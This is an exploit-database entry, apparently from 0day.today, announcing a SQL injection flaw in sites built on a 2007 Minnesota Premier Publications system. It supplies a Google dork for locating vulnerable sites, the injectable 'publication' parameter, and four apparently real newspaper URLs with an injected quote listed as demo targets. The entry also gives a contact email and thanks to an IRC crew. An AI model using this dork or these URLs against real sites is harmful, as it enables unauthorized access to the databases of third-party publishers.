id: 18278
date: 05/16/2012
title: Minnesota Premier Publications SQL injection Vulnerability
author: Becax
cves: 

# Exploit Title:  Minnesota Premier Publications [SQL injection Vulnerability]
# Author: Becax
# Home : CrimeIRCD
---------------------------------------------------------------------!
# Email : tomier2010@yahoo.com
# Category: [webapps]
# Version: n/a
# Google dork: "Copyright 2007 Minnesota Premier Publications"
# Tested on: win XP
---------------------------------------------------------------------!
# Exploit : http://localhost/index.php?publication=*=[Sql]
# Demo site:http://www.mnpubs.com/index.php?publication=downtown&page=65&story=18478%27
http://www.swjournal.com/index.php?publication=southwest&section=90&page=292%27
http://www.downtownjournal.com/index.php?publication=mn_parent&section=69%27
http://www.mngoodage.com/index.php?publication=goodage&section=105%27
---------------------------------------------------------------------!

Special thanks :
Pus my lovely, Adhel my cousin ,CrimeIRCD staff, AHA,Hew, All member #unix, and my Dji sam soe Filter & Google



#  0day.today [2023-03-26]  #